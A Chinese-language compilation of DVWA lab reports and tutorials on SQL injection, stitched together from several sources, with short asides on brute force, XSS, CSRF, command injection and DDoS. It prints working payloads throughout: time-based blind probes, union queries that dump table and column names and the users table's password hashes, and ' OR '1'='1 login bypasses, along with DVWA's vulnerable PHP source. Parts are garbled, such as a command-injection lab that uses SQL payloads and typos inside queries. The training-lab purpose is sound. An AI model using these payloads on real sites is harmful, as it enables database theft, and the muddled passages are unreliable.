DVWA中SQL注入实验

实训SQL注入（时间盲注）1一、实训目的1. 了解SQL注入的常用方式2. 掌握SQL时间盲注的方法二、实训环境1. DVWA平台2. Firefox浏览器（谷歌浏览器）三、实训内容1. 配置DVWA平台进入DVWA平台，选择DVWA Security，将安全级别设置为Low。

2. 测试SQL注入点（1）点击SQL Injection（Blind），进入测试页面。

（2）使用参数1' and sleep(5) #进行提交，页面明显延迟。

使用参数1 and sleep(5) #进行提交，页面没有延迟。

说明是基于字符的时间盲注。

（3）猜解数据库名的长度。

具体命令如下：•1' and if(length(database())=1,sleep(5),1) # //没有延迟•…………•1' and if(length(database())=4,sleep(5),1) # //明显延迟（4）二分法猜解数据库名。

具体命令如下：•1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)# //明显延迟•……•1' and if(ascii(substr(database(),1,1))<100,sleep(5),1)# //没有延迟•1' and if(ascii(substr(database(),1,1))>100,sleep(5),1)# //没有延迟修改substr函数的第二个参数，如substr(database(),2,1)进行测试，可以获得数据库的第二个字母。

（5）猜解数据库表的数量。

具体命令如下：•1' and if((select count(table_name) from information_schema.tables wheretable_schema=database() )=1,sleep(5),1)# //没有延迟•1' and if((select count(table_name) from information_schema.tables wheretable_schema=database() )=2,sleep(5),1)# //明显延迟（6）猜解数据库表名的长度。

DVWA（Dynamic Web Application Vulnerability Assessment System）是一个用于测试Web应用程序安全性的开源靶场系统。

它提供了各种常见的Web应用程序安全漏洞的模拟，包括SQL 注入漏洞。

SQL注入是一种常见的Web应用程序安全漏洞，攻击者可以通过在输入字段中插入恶意SQL 代码来操纵数据库，从而获取敏感信息、执行恶意操作或破坏数据。

要解析DVWA靶场中的SQL注入漏洞，您可以按照以下步骤进行：
1. 访问DVWA靶场，并选择具有SQL注入漏洞的页面。

2. 尝试在输入字段中输入恶意SQL代码，例如单引号、双引号、注释等，观察靶场是否出现预期之外的行为。

3. 如果靶场出现预期之外的行为，说明存在SQL注入漏洞。

此时，您可以进一步尝试提取敏感信息、执行恶意操作或破坏数据。

4. 分析漏洞发生的原因：SQL注入漏洞通常是由于应用程序对用户输入没有进行充分的验证和过滤，导致恶意代码被执行。

5. 了解漏洞的影响：SQL注入漏洞可能导致敏感数据泄露、数据库被篡改、甚至整个应用程序被破坏。

6. 修复漏洞：根据分析结果，您可以提出相应的修复建议，并协助管理员修复漏洞。

总之，解析DVWA靶场中的SQL注入漏洞需要具备一定的Web安全知识和经验。

通过分析漏洞发生的原因、了解漏洞的影响和提出相应的修复建议，您可以为Web应用程序的安全性做出贡献。

一、实验目的本次实验旨在了解网络攻击的基本原理、方法及防御措施，提高网络安全意识和防护能力。

通过模拟网络攻击实验，使学员掌握以下技能：1. 熟悉常见的网络攻击类型，如SQL注入、XSS跨站脚本攻击、CSRF跨站请求伪造等。

2. 掌握网络攻击的实验方法和步骤。

3. 了解网络安全防护措施，提高网络安全防护能力。

二、实验环境1. 操作系统：Windows 102. 浏览器：Chrome3. 实验工具：Burp Suite、SQLMap、XSSTrainer、DVWA等三、实验内容1. SQL注入攻击与防御（1）实验步骤① 在SQLMap工具中配置攻击参数，选择攻击目标。

② 执行攻击，观察SQL注入漏洞是否存在。

③ 若存在漏洞，尝试获取数据库信息。

（2）防御措施① 对用户输入进行过滤和转义。

② 使用参数化查询。

③ 限制数据库权限。

2. XSS跨站脚本攻击与防御（1）实验步骤① 在XSSTrainer平台上进行实验，尝试各种XSS攻击方式。

② 观察XSS漏洞是否存在。

（2）防御措施① 对用户输入进行编码和转义。

② 使用内容安全策略（CSP）。

③ 设置HTTPOnly和Secure标志。

3. CSRF跨站请求伪造攻击与防御（1）实验步骤① 在DVWA平台上设置CSRF漏洞，模拟攻击场景。

② 使用Burp Suite进行攻击，观察CSRF漏洞是否存在。

（2）防御措施① 使用验证码技术。

② 设置CSRF令牌。

③ 限制跨站请求的来源。

4. DDoS攻击与防御（1）实验步骤① 使用DDoS攻击工具，对实验主机进行攻击。

② 观察实验主机是否受到攻击。

（2）防御措施① 启用SYN Cookies处理SYN洪水攻击。

② 配置防火墙限制IP地址的连接速率。

③ 使用专业的DDoS防护服务。

四、实验结果与分析1. SQL注入攻击与防御实验结果表明，在未采取防护措施的情况下，SQL注入攻击容易成功。

通过过滤和转义用户输入、使用参数化查询、限制数据库权限等措施，可以有效防御SQL注入攻击。

SQL注⼊实验报告实验项⽬SQL注⼊综合性实验2020年9⽉25⽇⼀、实验综述1.实验⽬的及要求创建VMWARE虚拟机 的Windows环境，在虚拟机中安装phpstudy,并搭建DVWA环境，通过学习web⼯作原理与SQL注⼊⼯作原理，能够实现简单的SQL注⼊验证。

2.实验仪器、设备或软件VmwareDVWAphpStudy3.实验原理（1）Web⼯作原理：Web服务器的本质就是 接收数据 ⇒ HTTP解析 ⇒ 逻辑处理 ⇒ HTTP封包 ⇒ 发送数据。

Web服务器的⼯作流程：1)⽤户做出⼀个操作，可以是填写⽹址敲回车，可以是点链接，接着通过浏览器获取事件。

2)浏览器通过TCP三次握⼿与服务器程序连接3)浏览器将⽤户事件按照HTTP格式打包成⼀个数据包，其实质就是在待发送缓冲区中的⼀段有着HTTP协议格式的字节流。

4)浏览器确认对端可写，并将该数据包推⼊internet，该包经过⽹络最终递交到服务器程序。

5)服务端拿到该数据包后，同样以HTTP协议格式解包，解析客户端的意图。

6)得知客户端意图后，进⾏分类处理，或者提供某种⽂件、或者处理数据。

7)返回结果，将结果装⼊缓冲区，或是HTML⽂件、或是⼀张图⽚等。

8)按照HTTP协议格式将返回结果的数据包进⾏打包处理。

9)服务器确认对端可写，并将该数据包推⼊Internet，该包经过⽹络最终递交到客户端。

10)浏览器拿到包后，以HTTP协议格式解包，然后解析数据，如：是HTML⽂件11)浏览器将HTML⽂件展⽰在页⾯上。

Web服务器的⼯作流程（GET请求）Web服务器最主要的功能就是提供静态⽂件。

⽇常的上⽹浏览⼤多为⽹页浏览。

在GET请求下的⽂本服务器⼯作原理如下：主要步骤基本不变，只有第1）步、第6）步和第7）步有些不同。

第1）步：当⽤户点击⼀个⽹页链接或浏览器加载⼀些资源(css,jpg …)时产⽣。

第6）步：服务程序解包后，确定其为GET请求，并且是对该服务器上的某⼀资源的请求。

以下是dvwa实验实训手册：
一、实验环境搭建
1. 安装phpstudy+mysql，配置完成后可以直接访问IP:80。

2. 打开config.inc.php文件，修改以下内容：
$_DVWA[ 'db_server' ] = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvw';
二、实验内容
1. Brute Force(爆破)
a. 在登录界面，服务器只验证了参数Login是否被设置（isset函数在php中用来检测变量是否设置，该函数返回的是布尔类型的值，即true/false），没有任何的防爆破机制，且对参数username、password 没有做任何过滤，存在明显的sql注入漏洞。

b. 输入用户名和密码后，login抓包，send to Intruder。

c. 选择password的值为payload positions；payload Options导入自己的爆破字典，进行爆破。

d. 分析响应的长度，明显密码就是password。

2. SQL注入
a. 打开DVWA的初始化界面，账号密码为admin admin。

b. 在环境界面选择SQL Injection。

c. 攻击者通过注入恶意的SQL命令，破坏SQL查询语句的结构，从而达到执行恶意SQL语句的目的。

三、实验总结
通过本次实验，我们了解了dvwa实验的基本操作和安全防护措施，提高了对网络安全的认识和防范能力。

同时，也发现了自己在网络安全方面的不足之处，需要进一步加强学习和实践。

sql注入实验报告SQL注入实验报告引言：SQL注入是一种常见的Web应用程序漏洞，攻击者通过构造恶意的SQL查询语句，成功地绕过应用程序的身份验证和授权机制，从而获取未经授权的数据或者对数据库进行非法操作。

本实验旨在通过模拟SQL注入攻击的过程，深入了解其原理和危害，并探讨相应的防御措施。

一、实验背景在当今信息化社会中，Web应用程序的安全性备受关注。

然而，由于编程人员对于安全性的重视程度不够，很多应用程序存在SQL注入漏洞，给系统的安全性带来了巨大威胁。

因此，深入研究SQL注入攻击和防御措施具有重要意义。

二、实验目的1. 了解SQL注入攻击的原理和过程；2. 掌握SQL注入攻击的常见手法；3. 分析SQL注入攻击的危害和可能造成的后果；4. 探讨SQL注入防御的方法和技术。

三、实验过程1. 实验环境搭建在本实验中，我们使用了一款常见的Web应用程序演示平台，如DVWA （Damn Vulnerable Web Application）。

该平台提供了多种漏洞类型，包括SQL 注入。

通过在虚拟机中搭建DVWA环境，我们可以模拟真实的SQL注入攻击场景。

2. SQL注入攻击实验通过DVWA平台提供的漏洞，我们可以进行SQL注入攻击实验。

首先，我们选择一个目标页面，如登录页面，然后使用常见的SQL注入手法，如' OR '1'='1，尝试绕过身份验证机制。

如果成功登录，即表示注入攻击成功。

3. 分析攻击原理和过程在实验过程中，我们可以通过查看DVWA平台的源代码，了解SQL注入攻击的原理和过程。

攻击者通过构造特定的输入，使得应用程序在处理SQL查询语句时出现漏洞，从而导致注入攻击的成功。

四、实验结果与分析在实验中，我们成功地进行了SQL注入攻击，并绕过了登录页面的身份验证机制。

这表明该应用程序存在SQL注入漏洞，攻击者可以通过注入恶意的SQL语句，获取到未经授权的数据。

,dvwa搭建实验心得-回复DVWA搭建实验心得最近，在学习网络安全相关知识的过程中，我遇到了一个非常有趣且实用的工具，那就是DVWA（Damn Vulnerable Web Application）。

DVWA 是一个供安全研究人员和学习者练手的漏洞复现环境，通过搭建和利用DVWA，可以深入了解和掌握Web应用中的各种漏洞类型及其利用方法。

首先，我需要下载并搭建DVWA环境。

DVWA的官方网站提供了相应的下载链接，我可以选择下载最新版本的源代码。

然后，我需要将源代码放到一个Web服务器中，以便能够通过URL在浏览器中访问。

我选择了将DVWA放入本地的XAMPP服务器中，这样方便我在本地进行实验和学习。

搭建好DVWA环境后，我就可以开始进行实验了。

一开始，我只是按照官方的文档了解了一些基本的操作，例如如何登录、如何修改安全等级等。

随着实验的深入，我开始逐步尝试不同的漏洞类型和攻击方法。

首先，我选择了SQL注入漏洞。

通过DVWA提供的“SQL Injection”页面，我可以在输入框中尝试不同的注入语句，来获取数据库中的敏感信息，或者甚至是对数据库进行修改和删除操作。

通过这个实验，我深刻认识到了SQL注入漏洞的危害性，也更加重视相关防护措施的重要性。

接下来，我尝试了XSS（跨站脚本）漏洞。

通过在输入框中输入恶意的脚本代码，我成功实现了在DVWA页面中弹出警告框的效果。

这个实验让我明白了XSS漏洞可以被用来进行各种恶意攻击，例如窃取用户的敏感信息、进行钓鱼攻击等。

所以，在开发过程中，我们必须严格过滤和转义用户输入的数据，以防止XSS漏洞的利用。

另外一个我尝试的漏洞是CSRF（跨站请求伪造）。

通过构造一个带有恶意请求的网页，并诱使用户点击该网页，在DVWA中执行了一个对当前用户的账户进行转账的操作。

这个实验让我认识到了CSRF漏洞的危险性，并且明白了在实际应用中，通过添加随机的token或者验证referer等措施可以有效地防止CSRF攻击。

实训SQL注入（手工注入）1一、实训目的1. 了解SQL注入的常用方式2. 掌握SQL手工注入的测试方法二、实训环境1. DVWA平台2. Firefox浏览器（谷歌浏览器）三、实训内容1. 配置DVWA平台进入DVWA平台，选择DVWA Security，将安全级别设置为Low。

2. 测试SQL注入点（1）点击SQL Injection，进入测试页面。

（2）尝试输入单引号“’”，得到报错，说明页面存在注入点，同时很有可能是字符型注入。

（3）输入1 ‘or ’1‘= '1，返回所有数据信息，说明用户输入信息没有做控制。

（4）猜解SQL查询语句中的字段数。

具体命令格式如下：•1'or 1=1 order by 1 #•1'or 1=1 order by 2 #•1'or 1=1 order by 3 #（5）确定显示的字段顺序。

具体命令格式如下：•1' union select 1,2 #（6）获取当前数据库名称。

具体命令格式如下：•1' union select 1,database() #（7）获取数据库中的表名。

具体命令格式如下：•1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#（8）获取users表中的字段名。

具体命令格式如下：•1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' # （9）获取表中的数据。

具体命令格式如下：•1' union select group_concat(user_id,user),group_concat(password) fromusers #（10）通过工具或者网络，将用户的密码MD5值进行解密。

DVWA之SQL注⼊演练（low）1、设置把安全等级先调整为low，让⾃⼰获得点信⼼，免得⼀来就被打脸。

2、测试和分析页⾯的功能这⾥有⼀个输⼊框根据上⾯的提⽰，输⼊⽤户的id。

然后我们输⼊之后，发现它返回了关于这个user的信息！这⾥我们输⼊了“1”。

它返回三⾏数据，⼀⾏是我们输⼊的⽤户ID。

⼀⾏是⽤户名，另外⼀⾏是⽤户别名。

同时，看⼀下浏览器的地址栏那⾥，发现url成这样了这⾥有个id=1，是不是就是我们输⼊的user id呢？再输⼊“2”，发现url变成了好了，到这⾥，我们可以得出这⾥传进去的id的值是我们可以控制的。

我们在输⼊框中输⼊什么，就会通过id传进去什么！3、对参数进⾏测试对id这个参数进⾏测试，查看⼀下它是否存在sql注⼊漏洞。

我们在输⼊框⾥⾯输⼊“1'”，注意1后⾯有⼀个单引号“'”。

发现这⾥报错了，说我们的sql语句出现了语法错误。

我们可以进⾏这样⼀个猜测：⾸先它这个id是被两个“'”包住的。

查询语句可能是这样的：select firstname,surname from users where id = '1';当我们在1之后加⼀个引号，则会导致单引号数⽬不平衡，那么查询语句会变成这样：select firstname,surname from users where id = '1'';可以看到最后⼀个引号没被闭合，那我们该怎么办呢？其实有好多种解决的办法，下⾯就简单介绍下。

⽅法⼀：可以在原来的基础上再继续输⼊⼀个引号，也就是“1''”。

这时我们看⼀下查询语句：select firstname,surname from users where id = '1''';* 在where语句中，当出现多个字符串的时候，“=”将会选择优先级最⾼的⼀个，优先级是从左到右，依次降低的，也就是离“=”最近的⼀个。

一、实验背景命令执行漏洞是网络安全领域常见的漏洞类型之一，主要存在于Web应用程序中。

当应用程序未能正确处理用户输入时，攻击者可能利用该漏洞执行任意命令，进而控制服务器，获取敏感信息或造成其他损害。

本实验旨在通过模拟实验，了解命令执行漏洞的原理、攻击方式和修复方法。

二、实验环境1. 操作系统：Windows 102. 开发环境：Apache Tomcat 9.03. 实验工具：DVWA（Damn Vulnerable Web Application）三、实验步骤1. 启动DVWA实验环境，选择“Low”安全等级。

2. 访问DVWA实验环境，点击“SQL Injection”模块。

3. 在“SQL Injection”页面中，输入以下测试语句：“' OR '1'='1”：```http://localhost:8080/DVWA/vulnerabilities/sqli/?id=' OR '1'='1'```4. 观察结果，发现页面成功执行了命令并显示了结果，表明系统中存在命令注入漏洞。

5. 分析代码，发现该漏洞产生的原因是应用程序未能正确处理用户输入，导致攻击者可以构造恶意输入，进而执行任意命令。

6. 将安全等级提高到“Medium”，再次尝试攻击，发现部分特殊字符被黑名单过滤掉了，但命令执行依然可行。

7. 将安全等级提高到“High”，再次尝试攻击，发现用“&”字符进行的测试无法执行，但用“”字符进行的测试仍然可以执行。

8. 将安全等级提高到“Impossible”，再次尝试攻击，发现尝试执行命令被成功拦截，表明系统实施了一系列严格的输入验证措施。

9. 分析代码，发现系统增加了输入验证措施，包括验证CRSF令牌、确保IP地址的每个部分都是数字，并对输入进行了其他限制。

10. 分析代码，发现系统在“Impossible”安全等级下，成功阻止了命令注入漏洞。

DVWA SQL注入实验一．DVWA简介1.DVWA（Damn Vulnerable Web Application）是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用，旨在为安全专业人员测试自己的专业技能和工具提供合法的环境，帮助web开发者更好的理解web应用安全防范的过程。

2.DVWA共有十个模块，分别是:1)Brute Force（暴力（破解））2)Command Injection（命令行注入）3)CSRF（跨站请求伪造）4)File Inclusion（文件包含）5)File Upload（文件上传）6)Insecure CAPTCHA（不安全的验证码）7)SQL Injection（SQL注入）8)SQL Injection（Blind）（SQL盲注）9)XSS（Reflected）（反射型跨站脚本）10)XSS（Stored）（存储型跨站脚本）3.分为四种安全级别：Low，Medium，High，Impossible。

二．安全级别1.Low服务器端核心代码图1-1.核心服务器代码可以看到对于输入的变量id的值并没有过滤而直接用到SELECT语句中，报错还调用mydql_error()函数显示mysql数据库的报错信息。

1).判断是否存在注入，注入是字符型还是数字型输入1，查询成功：成功查询到一个用户；图1-2.成功查询到一个用户输入1'and'1'='2，查询失败，返回结果为空：图1-3.查询失败输入1'or'1234'='1234，查询成功：确认是否存在漏洞。

若有，则返回结果不止一个。

图1-4.查询成功返回了多个结果，说明存在字符型注入。

2).猜解SQL查询语句中的字段数输入1’or1=1order by1#，查询成功：图1-5.猜测字段查询成功输入1'or1=1order by2#，查询成功：图1-6.猜测字段查询成功输入1'or1=1order by3#，查询失败：图1-7.猜测字段查询失败说明执行的SQL查询语句中只有两个字段，即这里的First name、Surname。

dvwa靶场sql注入题解DVWA（Damn Vulnerable Web Application）是一个专门用于渗透测试和安全评估的开源Web应用程序。

它旨在帮助安全专业人员熟悉常见的Web应用程序安全漏洞，并提供实际的体验来加强他们的技能。

在DVWA靶场中，SQL注入是一种常见的攻击技术。

SQL注入是指通过将恶意构造的SQL查询插入到Web应用程序的数据库查询中，从而绕过应用程序的输入验证机制，获取未经授权的访问或者执行非预期的操作。

下面将为您解析DVWA靶场中的SQL注入题目，并提供相应的解决方法。

题目名称：SQL注入（低）题目描述：此题目是一个典型的低级别的SQL注入漏洞，您需要利用这个漏洞获取数据库中的信息。

解析与解决方法：1. 打开DVWA，登录进入DVWA靶场。

2. 在DVWA主页面中找到Security选项，点击进入。

3. 将安全级别从"low"调整为"medium"，并点击"Submit"。

4. 返回主页面，点击DVWA主页面的"SQL Injection"链接。

5. 在"SQL Injection"页面中，可以看到有一个输入框，我们可以猜测这个输入框可能存在SQL注入漏洞。

6. 在输入框中输入一个单引号（'），然后点击"Submit"按钮。

7. 发现网页显示了一个错误信息，这表明在输入框中存在SQL注入漏洞。

8. 在输入框中输入以下语句：' OR '1'='1' --然后点击"Submit"按钮。

9. 发现网页返回了所有的用户数据，说明我们成功利用SQL注入漏洞绕过了应用程序的验证机制。

10. 在实际渗透测试中，我们可以使用SQL注入来获取敏感信息、更改数据库内容甚至获得系统权限。

通过以上步骤，我们成功完成了DVWA靶场中的SQL注入（低）题目。

DVWA演练平台之SQL注⼊（全新认识）1.开启平台，打开页⾯（low）。

2.测试id参数。

加单引号试试:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1闭合了前⾯的单引号，所以后⾯的就需要注释掉。

SQL语句注释：①“#” ②“-- ”3.分析源码。

1 <?php23if(isset($_GET['Submit'])){45// Retrieve data67$id = $_GET['id'];89$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";10$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );1112$num = mysql_numrows($result);1314$i = 0;1516while ($i < $num) {1718$first = mysql_result($result,$i,"first_name");19$last = mysql_result($result,$i,"last_name");2021$html .= '<pre>';22$html .= 'ID: ' . $id . '<br>名字: ' . $first . '<br>姓⽒: ' . $last;23$html .= '</pre>';2425$i++;26 }27 }28 ?>找到其中在数据库执⾏的SQL语句：SELECT first_name, last_name FROM users WHERE user_id = '$id'4.字段数查询。

DVWA之SQL注入演练（low）
注：初次安装的时候程序会创建一个名为dvwa的数据库
表里面有两张表段guestbook和users（这里有用的就是它了）
打开users表段里面又有五个字段，user_id，first_name，last_name，user，password
，
配置好相关信息后，开始行动输入ID“1”
下面就显示
输入2,3,4....自己动手看吧
下面开始注入先来看代码
$id = $_GET['id'];//这里是获取我们输入的变了id
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; //获取后没有过滤直接进入了SQL语句..需要注意的是，变量是字符型，不是数字型.
我们输入1' and 1=1 #
返回结果（正常的界面）
如果我们输入1' and 1=2 # 结果是什么呢？try it。

返回了空白，就是没有了上面图片中显示的红色字体.
(如果我们是输入1 and 1=1# 和1 and 1=2 # 都是会返回信息给我们，这样就难以获取有用信息了）
后面我就不想继续了........只要把and 1=1 换成你的注入代码就OK了.。

安装DVWA对sql注⼊进⾏测试.1.dvwa是⼀个开源⽤来测试sql注⼊的php⽹站2.源码地址:https:///digininja/DVWA 下载都在这⾥3.下载dvwa，通过配置host可以下载相应资源⽂件(资源⽂件名 dvwa-master)4.下载xampp,通过配置host可以下载相应资源⽂件5.安装xampp6.将dvwa资源⽂件拷贝到 xampp/htdocs⽬录下 ,重命名将 (dvwa-master 改为 dvwa)7.复制dvwa的配置⽂件cp ./htdocs/dvwa/config/config.inc.php.dist ./htdocs/dvwa/config/config.inc.php8.修改conig.inc.php配置⽂件主要是配置数据库,连接本地数据库，创建dvwa数据库$_DVWA = array();$_DVWA[ 'db_server' ] = '数据库ip地址';$_DVWA[ 'db_database' ] = '数据库名';$_DVWA[ 'db_user' ] = '账号';$_DVWA[ 'db_password' ] = '密码';$_DVWA[ 'db_port'] = '端⼝';9.启动xampp./opt/lampp/lampp start10.访问页⾯ http://localhost:port/dvwa11.默认没有数据库表，进⼊ Setup / Reset DB ,拉到最下⾯，创建数据库表.12.这样dvwa就创建好了。

13.将安全等级调成low，默认是impassiable14.测试sql注⼊ :1' and 1=2 union select first_name,last_name from users --。

Low1.尝试先输入数字，发现只有1~5，有回显2.测试是否存在SQL 注入，输入1’，报错了3.查看源代码，可知它是从users 表里获取数据4.# 是MySQL中的注释符，它会把之后的内容都给禁用了。

尝试输入1’and 1=1#，正常显示。

得知，它构造的SQL 语句是:"SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#;"5.再次尝试输入1’ or 1=1#，得知，它构造的SQL 语句是:"SELECT first_name, last_name FROM users WHERE user_id = '1' or 1=1#;"6.构造语句1’ union select 1,2 #，获取字段数7.构造语句1’ union select database(),user() #，获取数据库，当前的用户名8.构造’ union select table_name,table_name from information_schema.tables whe retable_schema='dvwa' # ，获取数据库里的表9.构造’ union select column_name,column_name from information_schema.columnswhere table_schema='dvwa' and table_name=’users’ # ，获取数据库里的表10.构造‘ union select user_id,password from ers ，获取数据11.修复方法过滤任何形式的‘，包括任何转义符.MediumHigh1.步骤与low 一样2.爆数据库，’ union select schema_name from information_schema.schemata #3.爆表，’ union select table_name,table_name from information_schema.tables wheretable_schema='dvwa' #4.爆字段，’ union select column_name,column_name from information_schema.columnswhere table_schema='dvwa' and table_name=’users’ #5.爆数据，’ union select user_id, password from ers6.修复7.尝试获取数据库名，1’ union select datebase(),user()。